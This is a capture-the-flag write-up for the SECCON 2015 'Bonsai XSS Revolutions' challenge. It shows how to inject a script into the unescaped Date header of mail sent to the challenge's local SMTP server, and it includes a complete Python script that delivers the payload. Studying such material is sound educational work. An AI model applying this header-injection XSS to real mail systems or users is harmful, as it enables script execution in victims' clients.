SECCON CTF 2015 – Bonsai XSS Revolutions (Web) – Write-up

Bonsai XSS Revolutions

Category: Web Points: 200 Solves: 49

Description:

What is your browser (User-Agent) ?
hakoniwaWebMail_20151124.zip
Requirement: .NET Framework 4.5


The provided binary is a .NET executable that mimics a small Windows desktop.

On startup, the application opens a fake web browser, connects to a mailbox and then displays new emails one by one.

[Screenshot: xss_bonsai]

First, we notice that we cannot directly interact with the application. So, let’s find a way to send emails to keigo.yamazaki@tsuribori.test.

A quick netstat check reveals that the process is listening on TCP port 25 (SMTP):

C:\WINDOWS\system32>netstat -onab
Active connections
 Proto   Local address    Foreign address    State
 TCP     127.0.0.1:25     0.0.0.0:0          LISTENING
 [hakoniwaWebMail.exe]

Let's try to connect:

$ nc localhost 25
220 tsuribori.test Tsuribori-SMTPserver by KeigoYAMAZAKI, 2014.12.09- ESMTP

Good! An SMTP server, as expected.

Since the challenge name refers to XSS, we first tried to send an HTML email, but the HTML in the body is not rendered...

Maybe we can inject HTML into the header fields instead:

HELO tsuribori.test
MAIL FROM: admin@gayluchat.org
RCPT TO: keigo.yamazaki@tsuribori.test
DATA
From: Me<img src=0>
To: You<img src=0>
Date: Today<img src=0>
Subject: Test Message<img src=0>

This is a text message !
.

Which gives us:

[Screenshot: xss_mail]

The Date header is the one rendered without escaping, so that is our injection point. Since the flag is the browser's User-Agent (as the challenge description hints), we use this payload to display it:

<img src=0 onerror=alert(navigator.userAgent)>

[Screenshot: flag_xss]
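As an added example (not part of the original write-up or of the challenge files), the following Python script replays the SMTP session above over a raw socket and puts the payload in the Date header. The host, port and recipient come from the netstat output and the challenge mailbox; the sender address, the reply parser and the lenient status-code check are assumptions, since the Tsuribori server is a custom implementation and only standard RFC 5321 reply codes are expected here.

```python
import socket

# Constructed for this example: host/port from the netstat output in the
# write-up, recipient from the challenge mailbox, sender assumed.
SMTP_HOST = "127.0.0.1"
SMTP_PORT = 25
RECIPIENT = "keigo.yamazaki@tsuribori.test"
SENDER = "admin@example.test"  # assumed: any syntactically valid sender address

# The payload from the write-up: a broken image whose error handler pops the User-Agent.
PAYLOAD = "<img src=0 onerror=alert(navigator.userAgent)>"


def build_message(payload, sender=SENDER, recipient=RECIPIENT):
    """Return the DATA section (headers, blank line, body) as CRLF-joined lines.

    The payload goes into the Date header, the field the write-up found rendered
    without escaping; the other headers stay benign so the mail still parses.
    """
    lines = [
        f"From: {sender}",
        f"To: {recipient}",
        f"Date: Today{payload}",
        "Subject: Test Message",
        "",
        "This is a text message !",
    ]
    return "\r\n".join(lines)


def dot_stuff(message):
    """RFC 5321 transparency: prefix lines starting with '.' with another '.',
    otherwise a payload line such as '.foo' would be read as the end of DATA."""
    return "\r\n".join(
        "." + line if line.startswith(".") else line
        for line in message.split("\r\n")
    )


def reply_code(reply):
    """Status code of an SMTP reply; for multi-line replies the first line carries it."""
    return int(reply[:3])


def read_reply(sock):
    """Read one full reply. The last line has a space after the code ('250 OK'),
    continuation lines a hyphen ('250-SIZE ...')."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
        if buf.endswith(b"\r\n"):
            last = buf[:-2].rsplit(b"\r\n", 1)[-1]
            if len(last) >= 4 and last[3:4] == b" ":
                return buf.decode("latin-1")


def send_mail(message, host=SMTP_HOST, port=SMTP_PORT, sender=SENDER, recipient=RECIPIENT):
    """Replay the nc session from the write-up over a socket, checking each reply.

    Expected codes are the standard ones (RFC 5321); the challenge server is custom,
    so only the first digit is compared (2xx/3xx = success) rather than exact values.
    """
    steps = [
        (None, "2"),                                   # greeting banner (220)
        ("HELO tsuribori.test", "2"),
        (f"MAIL FROM:<{sender}>", "2"),
        (f"RCPT TO:<{recipient}>", "2"),
        ("DATA", "3"),                                 # 354: start mail input
        (dot_stuff(message) + "\r\n.", "2"),           # message, then a lone '.' ends DATA
        ("QUIT", "2"),
    ]
    with socket.create_connection((host, port), timeout=10) as sock:
        for command, expected in steps:
            if command is not None:
                sock.sendall(command.encode("latin-1") + b"\r\n")
            reply = read_reply(sock)
            if not reply.startswith(expected):
                raise RuntimeError(f"{command!r}: unexpected reply {reply.strip()!r}")
    return True


if __name__ == "__main__":
    send_mail(build_message(PAYLOAD))
    print("Mail accepted; the Date header now carries the XSS payload.")
```

Run it while hakoniwaWebMail.exe is up and the next mail displayed in the fake browser should fire the alert. The dot-stuffing step matters when a payload line happens to begin with a period: without it, the server would treat that line as the end of the message, exactly as the lone "." did in the nc session.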
